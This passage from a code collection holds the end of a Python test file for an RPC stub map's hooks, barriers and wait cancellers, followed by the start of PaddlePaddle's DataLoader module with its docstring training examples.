stub.MakeSyncCall() (if any) and calls hooks with correct request/response
objects.
"""
calls = []
call_obj = object()
request_obj = object()
response_obj = object()
response_obj_2 = object()
def Pre(service, call, request, response):
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj)
calls.append('pre')
class Stub(object):
def MakeSyncCall(innerself, service, call, request, response):
calls.append('stub')
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj)
return response_obj_2
def Post(service, call, request, response):
calls.append('post')
self.assertEqual('service1', service)
self.assertEqual(call, call_obj)
self.assertEqual(request, request_obj)
self.assertEqual(response, response_obj_2)
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after', Post)
self.assertEqual(
response_obj_2,
self.stubmap.MakeSyncCall('service1', call_obj, request_obj,
response_obj))
self.assertEqual(['pre', 'stub', 'post'], calls)
calls = []
self.stubmap.GetPreCallHooks().Clear()
self.assertEqual(
response_obj_2,
self.stubmap.MakeSyncCall('service1', call_obj, request_obj,
response_obj))
self.assertEqual(['stub', 'post'], calls)
def testMakeSyncCall_Exception(self):
"""Test end cases around rpcs that raise exceptions."""
calls = []
def Pre(service, call, request, response):
calls.append('pre')
class Stub(object):
def MakeSyncCall(self, service, call, request, response):
calls.append('stub')
raise RuntimeError('stub')
def Post4(service, call, request, response):
calls.append('post4')
def Post5(service, call, request, response, rpc):
calls.append('post5')
def Post6(service, call, request, response, rpc, error):
calls.append('post6')
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after4', Post4)
self.stubmap.GetPostCallHooks().Append('after5', Post5)
self.stubmap.GetPostCallHooks().Append('after6', Post6)
self.assertRaises(RuntimeError,
self.stubmap.MakeSyncCall, 'service1', None, None, None)
self.assertEqual(['pre', 'stub', 'post6'], calls)
def testCopyStubMap(self):
class Stub(object):
pass
self.stubmap.RegisterStub('service1', Stub())
stubmap = self.stubmap._CopyStubMap()
self.assertIn('service1', stubmap)
self.assertLen(stubmap, 1)
stubmap['service2'] = Stub()
self.assertIsNone(self.stubmap.GetStub('service2'))
class BarrierRPC(apiproxy_rpc.RPC):
"""Mock low-level RPC class for barrier test."""
def __init__(self, stub):
apiproxy_rpc.RPC.__init__(self, stub=stub)
self._wait_for_future = None
def _MakeCallImpl(self):
self._wait_for_future = self.stub.Add(self.request, self)
apiproxy_rpc.RPC._MakeCallImpl(self)
def _SendRequest(self):
if self._wait_for_future:
futures.wait([self._wait_for_future])
apiproxy_rpc.RPC._SendRequest(self)
class BarrierStub(object):
"""Mock stub for barrier test."""
THREADSAFE = True
def __init__(self):
self.queue = []
self.rpc_to_return = None
def CreateRPC(self):
return self.rpc_to_return or BarrierRPC(self)
def SetRpcToReturn(self, rpc):
"""Which RPC should CreateRPC return?
Args:
rpc: This RPC will be returned by next CreateRPC call.
"""
self.rpc_to_return = rpc
def Add(self, order, rpc):
if rpc is None:
rpc = 0
if order is None:
order = 0
self.queue.append((order, rpc))
self.queue.sort(key=lambda entry: entry[0])
wait_for_future = None
for entry in self.queue:
if entry[1] == rpc:
break
wait_for_future = entry[1].future
return wait_for_future
def MakeSyncCall(self, service, call, request, response):
if call == 'error':
raise ZeroDivisionError('booh')
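# Illustrative note (hedged): BarrierStub.Add() keeps its queue sorted by the
# request value and hands each newly added RPC the future of whichever queued
# RPC sorts immediately before it at that moment, so _SendRequest() for a given
# request only proceeds once the preceding request has completed. E.g. adding
# requests 0, 1, 2 in order makes RPC 1 wait on RPC 0 and RPC 2 wait on RPC 1.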
class BarrierTest(absltest.TestCase):
"""Tests specific for wait_any() and wait_all()."""
def setUp(self):
super(BarrierTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
self.stub = BarrierStub()
self.stubmap.RegisterStub('barrier', self.stub)
def testWaitAll(self):
"""Test UserRPC.wait_all()."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
apiproxy_stub_map.UserRPC.wait_all([rpcs[3], rpcs[2], rpcs[1]])
self.assertCountEqual(calls, [1, 2, 3])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs)
self.assertCountEqual(calls, [0, 4])
apiproxy_stub_map.UserRPC.wait_all([])
def testWaitAny(self):
"""Test UserRPC.wait_any()."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
wait_for_rpcs = [rpcs[3], rpcs[2], rpcs[1]]
rpc = apiproxy_stub_map.UserRPC.wait_any(wait_for_rpcs)
self.assertIn(rpc, wait_for_rpcs)
self.assertLen(calls, 1)
first_call = calls[0]
self.assertEqual(rpc, rpcs[first_call])
calls = []
rpc = apiproxy_stub_map.UserRPC.wait_any([rpcs[0]])
self.assertEqual(rpc, rpcs[0])
self.assertEqual(calls, [0])
calls = []
rpcs = set(rpcs)
while rpcs:
rpc = apiproxy_stub_map.UserRPC.wait_any(rpcs)
rpcs.remove(rpc)
expected_calls = [1, 2, 3, 4]
expected_calls.remove(first_call)
self.assertCountEqual(calls, expected_calls)
rpc = apiproxy_stub_map.UserRPC.wait_any([])
self.assertIsNone(rpc)
def testNoNestedCallbacks(self):
"""Test that callbacks will never be nested inside each other."""
rpcs = []
calls = []
for i in range(5):
def _Callback(arg=i):
calls.append(arg+100)
other_rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
other_rpc.make_call('call', arg, None)
other_rpc.wait()
calls.append(arg+200)
rpc = apiproxy_stub_map.UserRPC('barrier', callback=_Callback,
stubmap=self.stubmap)
rpc.make_call('call', i, None)
rpcs.append(rpc)
apiproxy_stub_map.UserRPC.wait_all([rpcs[1]])
self.assertCountEqual(calls, [101, 201])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs[:3])
self.assertCountEqual(calls, [100, 200, 102, 202])
calls = []
apiproxy_stub_map.UserRPC.wait_all(rpcs)
self.assertCountEqual(calls, [103, 203, 104, 204])
def testCheckSuccess(self):
"""Test that check_success() doesn't raise InterruptedError."""
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('call', 42, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
rpc.check_success()
def testCheckSuccess_Exception(self):
"""Test that check_success() doesn't overwrite low-level exceptions."""
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('error', 42, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
self.assertRaises(ZeroDivisionError, rpc.check_success)
def testMultiThreadedWait(self):
"""Test that UserRpc() works in presence of multiple threads."""
exceptions = []
calls = []
some_random_number = 42
def Call(request):
try:
barrier_rpc = TestRpc(self.stub)
self.stub.SetRpcToReturn(barrier_rpc)
rpc1 = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc1.make_call('call', request, None)
rpc = apiproxy_stub_map.UserRPC.wait_any([rpc1])
self.assertIs(rpc1, rpc)
rpc.check_success()
except:
exceptions.append(traceback.format_exc())
class TestRpc(BarrierRPC):
"""Overrides BarrierRPC _SendRequest() to simulate race condition.
When the first RPC calls _SendRequest() it issues another RPC on a separate thread.
"""
def _SendRequest(self, *args, **kwargs):
if not calls:
calls.append(1)
t = threading.Thread(target=Call, args=(some_random_number - 1,))
t.setDaemon(True)
t.start()
t.join()
else:
calls.append(2)
super(TestRpc, self)._SendRequest(*args, **kwargs)
Call(some_random_number)
self.assertEqual([1, 2], calls)
self.assertEqual([], exceptions, '\n'.join(exceptions))
class WaitCancellerTest(absltest.TestCase):
"""Tests for WaitCanceller functionality with wait_any()."""
def setUp(self):
super(WaitCancellerTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
self.stub = BarrierStub()
self.stubmap.RegisterStub('barrier', self.stub)
def testWaitAny_JustCanceller(self):
"""Calling wait_any() on just the wait_canceller should return it."""
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
def testCancelCalledTwice(self):
"""Calling cancel() multiple times doesn't cause a crash."""
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
def testWaitAny_CancellerFinishesFirst(self):
"""Wait on a cancelled canceller and a blocked RPC returns canceller."""
blocking_event = threading.Event()
class BlockingRPC(BarrierRPC):
"""RPC that blocks until blocking_event."""
def _SendRequest(self, *args, **kwargs):
blocking_event.wait()
super(BlockingRPC, self)._SendRequest(*args, **kwargs)
blocking_rpc = BlockingRPC(self.stub)
self.stub.SetRpcToReturn(blocking_rpc)
rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc.make_call('call', 0, None)
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([rpc, wait_canceller])
self.assertEqual(wait_canceller, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller, rpc])
self.assertEqual(wait_canceller, finished_rpc)
blocking_event.set()
def testWaitAny_RpcFinishesFirst(self):
"""Wait on a cancelled canceller and finished RPC should return the RPC."""
rpc_finished = threading.Event()
class TestRPC(BarrierRPC):
"""RPC that blocks until blocking_event."""
def _SendRequest(self, *args, **kwargs):
super(TestRPC, self)._SendRequest(*args, **kwargs)
rpc_finished.set()
blocking_rpc = TestRPC(self.stub)
self.stub.SetRpcToReturn(blocking_rpc)
rpc = apiproxy_stub_map.UserRPC('barrier', stubmap=self.stubmap)
rpc.make_call('call', 0, None)
rpc_finished.wait()
wait_canceller = apiproxy_stub_map.WaitCanceller()
wait_canceller.cancel()
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([rpc, wait_canceller])
self.assertEqual(rpc, finished_rpc)
finished_rpc = apiproxy_stub_map.UserRPC.wait_any([wait_canceller, rpc])
self.assertEqual(rpc, finished_rpc)
def main(unused_argv):
absltest.main()
if __name__ == '__main__':
absltest.main(main)
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] This value is used when getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
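# Usage sketch for the two module-level toggles above (illustrative only,
# assuming this module is importable as paddle.fluid.reader): calling either
# function with no argument reads the current value, while calling it with a
# single bool sets the value globally.
#
#   from paddle.fluid import reader
#   reader.use_pinned_memory(False)          # turn pinned memory off everywhere
#   assert reader.use_pinned_memory() is False
#   assert reader.keep_data_loader_order()   # defaults to True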
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
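# Illustrative only: _convert_places normalizes a single place or a list/tuple
# of places into a list of generic core.Place wrappers, e.g.
#
#   _convert_places(core.CPUPlace())                       # -> [core.Place]
#   _convert_places([core.CPUPlace(), core.CUDAPlace(0)])  # -> [core.Place, core.Place]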
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
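# Consumer-side sketch (illustrative only): _reader_process_loop terminates the
# stream with a single None sentinel, so the reader thread in the parent
# process typically loops like this:
#
#   while True:
#       tensor_list = data_queue.get(timeout=QUEUE_GET_TIMEOUT)
#       if tensor_list is None:   # end of one pass over the batch reader
#           break
#       # ... push the tensors into the C++ blocking queue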
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing the iterator protocol of Python 2.x inside the
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
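# Illustrative only: _check_input_array rejects ragged nested lists because
# they convert to an object-dtype ndarray, e.g.
#
#   DataLoaderBase._check_input_array([[1, 2], [3, 4]])  # ok, regular 2x2 array
#   DataLoaderBase._check_input_array([[1, 2], [3]])     # raises the TypeError above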
class DataLoader(object):
"""
DataLoader provides an iterator which iterates over the given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-process data loading;
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For a map-style dataset (a sample can be fetched from the dataset with a
given index), please see :code:`paddle.io.Dataset`.
For an iterable-style dataset (samples are read from the dataset
iteratively, like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` are set to None; each item read from :attr:`dataset`
should be batched data and will be processed by the function defined by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
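A minimal sketch of the disabled-batching case (illustrative only, assuming
:attr:`dataset` already yields fully batched data): passing :attr:`batch_size`
as None (with :attr:`batch_sampler` also None) turns automatic batching off.
.. code-block:: python
loader = paddle.io.DataLoader(dataset,
batch_size=None,
num_workers=2)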
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialized by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whether to shuffle indices order before generating
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether to drop the last incomplete batch when the dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0 (same as :attr:`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use a buffered reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupy a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine (e.g. the
space of '/dev/shm' on a Linux operating system) is large enough.
Shared memory will only be enabled in multi-process mode (num_workers
> 0). Default True.
timeout(int): the timeout value for getting data from the output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
the worker id when each subprocess starts, if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading an iterable dataset with a multi-process DataLoader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
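# Illustrative note (not part of the original docs): __call__ above simply
# delegates to __iter__, so `for batch in loader:` and `for batch in loader():`
# behave the same; the docstring examples use the callable form.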
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using a Python thread and pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using a for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupy a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(image, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
